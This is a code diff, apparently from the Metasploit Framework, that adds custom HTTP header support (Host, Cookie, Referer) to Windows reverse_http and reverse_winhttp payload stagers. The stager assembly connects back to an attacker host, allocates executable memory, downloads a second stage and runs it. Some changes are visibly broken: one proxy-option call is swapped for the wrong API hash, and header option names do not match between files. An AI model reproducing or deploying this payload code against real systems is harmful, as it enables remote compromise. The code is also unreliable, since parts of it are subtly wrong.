sempervictus
diff --git a/‎lib/msf/core/handler/reverse_http.rb
Lines changed: 0 additions & 2 deletions b/‎lib/msf/core/handler/reverse_http.rb
Lines changed: 0 additions & 2 deletions
diff --git a/‎lib/msf/core/payload/transport_config.rb
Lines changed: 18 additions & 10 deletions b/‎lib/msf/core/payload/transport_config.rb
Lines changed: 18 additions & 10 deletions
diff --git a/‎lib/msf/core/payload/windows/reverse_http.rb
Lines changed: 79 additions & 29 deletions b/‎lib/msf/core/payload/windows/reverse_http.rb
Lines changed: 79 additions & 29 deletions
diff --git a/‎lib/msf/core/payload/windows/reverse_winhttp.rb
Lines changed: 34 additions & 12 deletions b/‎lib/msf/core/payload/windows/reverse_winhttp.rb
Lines changed: 34 additions & 12 deletions
@@ -347,8 +347,6 @@ def on_request(cli, req)
           blob = self.generate_stage(
             url:   url,
             uuid:  uuid,
-            lhost: uri.host,
-            lport: uri.port,
             uri:   conn_id
           )
 
 
@@ -56,16 +56,17 @@ def transport_config_reverse_http(opts={})
 
     ds = opts[:datastore] || datastore
     {
-      scheme:      ds['OverrideScheme'] || 'http',
-      lhost:       opts[:lhost] || ds['LHOST'],
-      lport:       (opts[:lport] || ds['LPORT']).to_i,
-      uri:         uri,
-      ua:          ds['MeterpreterUserAgent'],
-      proxy_host:  ds['PayloadProxyHost'],
-      proxy_port:  ds['PayloadProxyPort'],
-      proxy_type:  ds['PayloadProxyType'],
-      proxy_user:  ds['PayloadProxyUser'],
-      proxy_pass:  ds['PayloadProxyPass']
+      scheme:          ds['OverrideScheme'] || 'http',
+      lhost:           opts[:lhost] || ds['LHOST'],
+      lport:           (opts[:lport] || ds['LPORT']).to_i,
+      uri:             uri,
+      ua:              ds['MeterpreterUserAgent'],
+      proxy_host:      ds['PayloadProxyHost'],
+      proxy_port:      ds['PayloadProxyPort'],
+      proxy_type:      ds['PayloadProxyType'],
+      proxy_user:      ds['PayloadProxyUser'],
+      proxy_pass:      ds['PayloadProxyPass'],
+      custom_headers:  get_custom_headers(ds)
     }.merge(timeout_config(opts))
   end
 
@@ -80,6 +81,13 @@ def transport_config_reverse_named_pipe(opts={})
 
 private
 
+  def get_custom_headers(ds)
+    headers = ""
+    headers << "Host: #{ds['HttpHost']}\r\n" if ds['HttpHost']
+    headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie']
+    headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer']
+  end
+
   def timeout_config(opts={})
     ds = opts[:datastore] || datastore
     {
 
@@ -36,7 +36,10 @@ def initialize(*args)
         OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
         OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
         OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
-        OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']])
+        OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]),
+        OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+        OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+        OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
       ], self.class)
   end
 
@@ -47,22 +50,23 @@ def generate(opts={})
     ds = opts[:datastore] || datastore
     conf = {
       ssl:         opts[:ssl] || false,
-      host:        ds['LHOST'],
+      host:        ds['LHOST'] || '127.127.127.127',
       port:        ds['LPORT'],
       retry_count: ds['StagerRetryCount'],
-      retry_wait: ds['StagerRetryWait']
+      retry_wait:  ds['StagerRetryWait']
     }
 
     # Add extra options if we have enough space
-    if self.available_space && required_space <= self.available_space
-      conf[:url]        = luri + generate_uri(opts)
-      conf[:exitfunk]   = ds['EXITFUNC']
-      conf[:ua]         = ds['MeterpreterUserAgent']
-      conf[:proxy_host] = ds['PayloadProxyHost']
-      conf[:proxy_port] = ds['PayloadProxyPort']
-      conf[:proxy_user] = ds['PayloadProxyUser']
-      conf[:proxy_pass] = ds['PayloadProxyPass']
-      conf[:proxy_type] = ds['PayloadProxyType']
+    if self.available_space.nil? || required_space <= self.available_space
+      conf[:url]            = luri + generate_uri(opts)
+      conf[:exitfunk]       = ds['EXITFUNC']
+      conf[:ua]             = ds['MeterpreterUserAgent']
+      conf[:proxy_host]     = ds['PayloadProxyHost']
+      conf[:proxy_port]     = ds['PayloadProxyPort']
+      conf[:proxy_user]     = ds['PayloadProxyUser']
+      conf[:proxy_pass]     = ds['PayloadProxyPass']
+      conf[:proxy_type]     = ds['PayloadProxyType']
+      conf[:custom_headers] = get_custom_headers(ds)
     else
       # Otherwise default to small URIs
       conf[:url]        = luri + generate_small_uri
@@ -71,6 +75,22 @@ def generate(opts={})
     generate_reverse_http(conf)
   end
 
+  #
+  # Generate the custom headers string
+  #
+  def get_custom_headers(ds)
+    headers = ""
+    headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost']
+    headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie']
+    headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer']
+
+    if headers.length > 0
+      headers
+    else
+      nil
+    end
+  end
+
   #
   # Generate and compile the stager
   #
@@ -138,10 +158,23 @@ def required_space
     # Proxy options?
     space += 200
 
+    # Custom headers? Ugh, impossible to tell
+    space += 512
+
     # The final estimated size
     space
   end
 
+  #
+  # Convert a string into a NULL-terminated ASCII byte array
+  #
+  def asm_generate_ascii_array(str)
+    (str.to_s + "\x00").
+      unpack("C*").
+      map{ |c| "0x%.2x" % c }.
+      join(",")
+  end
+
   #
   # Generate an assembly stub with the configured feature set and options.
   #
@@ -155,6 +188,7 @@ def required_space
   # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS
   # @option opts [String] :proxy_user The optional proxy server username
   # @option opts [String] :proxy_pass The optional proxy server password
+  # @option opts [String] :custom_headers The optional collection of custom headers for the payload.
   # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up
   # @option opts [Integer] :retry_wait The seconds to wait before retry a new request
   #
@@ -181,6 +215,8 @@ def asm_reverse_http(opts={})
     proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user]
     proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass]
 
+    custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers])
+
     http_open_flags = 0
     secure_flags = 0
 
@@ -222,10 +258,10 @@ def asm_reverse_http(opts={})
         push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
         push 0x696e6977        ; ...
         push esp               ; Push a pointer to the "wininet" string on the stack.
-        push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp               ; LoadLibraryA( "wininet" )
         xor ebx, ebx           ; Set ebx to NULL to use in future arguments
-      ^
+    ^
 
     if proxy_enabled
       asm << %Q^
@@ -238,7 +274,7 @@ def asm_reverse_http(opts={})
                                ; LPCTSTR lpszProxyName (via call)
         push 3                 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
         push ebx               ; LPCTSTR lpszAgent (NULL)
-        push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
         call ebp
       ^
     else
@@ -249,7 +285,7 @@ def asm_reverse_http(opts={})
         push ebx               ; LPCTSTR lpszProxyName (NULL)
         push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
         push ebx               ; LPCTSTR lpszAgent (NULL)
-        push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
         call ebp
       ^
     end
@@ -267,10 +303,10 @@ def asm_reverse_http(opts={})
         db "#{opts[:url]}", 0x00
       got_server_host:
         push eax               ; HINTERNET hInternet (still in eax from InternetOpenA)
-        push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
         call ebp
         mov esi, eax           ; Store hConnection in esi
-      ^
+    ^
 
     # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it
     # doesn't set the Proxy-Authorization header on the CONNECT request.
@@ -286,7 +322,7 @@ def asm_reverse_http(opts={})
                              ; LPVOID lpBuffer (username from previous call)
         push 43              ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
         push esi             ; hConnection
-        push 0x869E4675      ; hash( "wininet.dll", "InternetSetOptionA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call ebp
       ^
     end
@@ -302,7 +338,7 @@ def asm_reverse_http(opts={})
                              ; LPVOID lpBuffer (password from previous call)
         push 44              ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
         push esi             ; hConnection
-        push 0x869E4675      ; hash( "wininet.dll", "InternetSetOptionA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpAddRequestHeaders')}
         call ebp
       ^
     end
@@ -317,7 +353,7 @@ def asm_reverse_http(opts={})
         push edi               ; server URI
         push ebx               ; method
         push esi               ; hConnection
-        push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
         call ebp
         xchg esi, eax          ; save hHttpRequest in esi
      ^
@@ -334,7 +370,6 @@ def asm_reverse_http(opts={})
       send_request:
     ^
 
-
     if opts[:ssl]
       asm << %Q^
       ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
@@ -345,7 +380,7 @@ def asm_reverse_http(opts={})
         push eax               ; &dwFlags
         push 31                ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
         push esi               ; hHttpRequest
-        push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
         call ebp
       ^
     end
@@ -354,17 +389,32 @@ def asm_reverse_http(opts={})
       httpsendrequest:
         push ebx               ; lpOptional length (0)
         push ebx               ; lpOptional (NULL)
-        push ebx               ; dwHeadersLength (0)
-        push ebx               ; lpszHeaders (NULL)
+    ^
+
+    if custom_headers
+      asm << %Q^
+        push -1                ; dwHeadersLength (assume NULL terminated)
+        call get_req_headers   ; lpszHeaders (pointer to the custom headers)
+        db #{custom_headers}
+      get_req_headers:
+      ^
+    else
+      asm << %Q^
+        push ebx               ; HeadersLength (0)
+        push ebx               ; Headers (NULL)
+      ^
+    end
+
+    asm << %Q^
         push esi               ; hHttpRequest
-        push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
+        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
         call ebp
         test eax,eax
         jnz allocate_memory
 
      set_wait:
         push #{retry_wait}     ; dwMilliseconds
-        push 0xE035F044        ; hash( "kernel32.dll", "Sleep" )
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
         call ebp               ; Sleep( dwMilliseconds );
       ^
 
@@ -404,7 +454,7 @@ def asm_reverse_http(opts={})
       push 0x1000            ; MEM_COMMIT
       push 0x00400000        ; Stage allocation (4Mb ought to do us)
       push ebx               ; NULL as we dont care where the allocation is
-      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
     download_prep:
@@ -418,7 +468,7 @@ def asm_reverse_http(opts={})
       push 8192              ; read length
       push ebx               ; buffer
       push esi               ; hRequest
-      push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )
+      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
       call ebp
 
       test eax,eax           ; download failed? (optional?)
 
@@ -29,24 +29,26 @@ def initialize(*args)
   # Generate the first stage
   #
   def generate(opts={})
+    ds = opts[:datastore] || datastore
     conf = {
-      ssl:         opts[:ssl] || false,
-      host:        datastore['LHOST'] || '127.127.127.127',
-      port:        datastore['LPORT']
+      ssl:  opts[:ssl] || false,
+      host: ds['LHOST'] || '127.127.127.127',
+      port: ds['LPORT']
     }
 
     # Add extra options if we have enough space
-    if self.available_space && required_space <= self.available_space
+    if self.available_space.nil? || required_space <= self.available_space
       conf[:uri]              = luri + generate_uri
-      conf[:exitfunk]         = datastore['EXITFUNC']
+      conf[:exitfunk]         = ds['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]
-      conf[:proxy_host]       = datastore['PayloadProxyHost']
-      conf[:proxy_port]       = datastore['PayloadProxyPort']
-      conf[:proxy_user]       = datastore['PayloadProxyUser']
-      conf[:proxy_pass]       = datastore['PayloadProxyPass']
-      conf[:proxy_type]       = datastore['PayloadProxyType']
-      conf[:retry_count]      = datastore['StagerRetryCount']
-      conf[:proxy_ie]         = datastore['PayloadProxyIE']
+      conf[:proxy_host]       = ds['PayloadProxyHost']
+      conf[:proxy_port]       = ds['PayloadProxyPort']
+      conf[:proxy_user]       = ds['PayloadProxyUser']
+      conf[:proxy_pass]       = ds['PayloadProxyPass']
+      conf[:proxy_type]       = ds['PayloadProxyType']
+      conf[:retry_count]      = ds['StagerRetryCount']
+      conf[:proxy_ie]         = ds['PayloadProxyIE']
+      conf[:custom_headers]   = get_custom_headers(ds)
     else
       # Otherwise default to small URIs
       conf[:uri]              = luri + generate_small_uri
@@ -93,6 +95,9 @@ def required_space
     # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
     space += 31
 
+    # Custom headers? Ugh, impossible to tell
+    space += 512 * 2
+
     # The final estimated size
     space
   end
@@ -167,6 +172,8 @@ def asm_reverse_winhttp(opts={})
     proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user])
     proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass])
 
+    custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers])
+
     http_open_flags = 0
     secure_flags = 0
 
@@ -434,8 +441,23 @@ def asm_reverse_winhttp(opts={})
         push ebx               ; TotalLength [6]
         push ebx               ; OptionalLength (0) [5]
         push ebx               ; Optional (NULL) [4]
+    ^
+
+    if custom_headers
+      asm << %Q^
+        push -1                ; dwHeadersLength (assume NULL terminated) [3]
+        call get_req_headers   ; lpszHeaders (pointer to the custom headers) [2]
+        db #{custom_headers}
+      get_req_headers:
+      ^
+    else
+      asm << %Q^
         push ebx               ; HeadersLength (0) [3]
         push ebx               ; Headers (NULL) [2]
+      ^
+    end
+
+    asm << %Q^
         push esi               ; HttpRequest handle returned by WinHttpOpenRequest [1]
         push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
         call ebp
Original file line number	Diff line number	Diff line change
`@@ -347,8 +347,6 @@ def on_request(cli, req)`
`347`	`347`	`blob = self.generate_stage(`
`348`	`348`	`url: url,`
`349`	`349`	`uuid: uuid,`
`350`		`- lhost: uri.host,`
`351`		`- lport: uri.port,`
`352`	`350`	`uri: conn_id`
`353`	`351`	`)`
`354`	`352`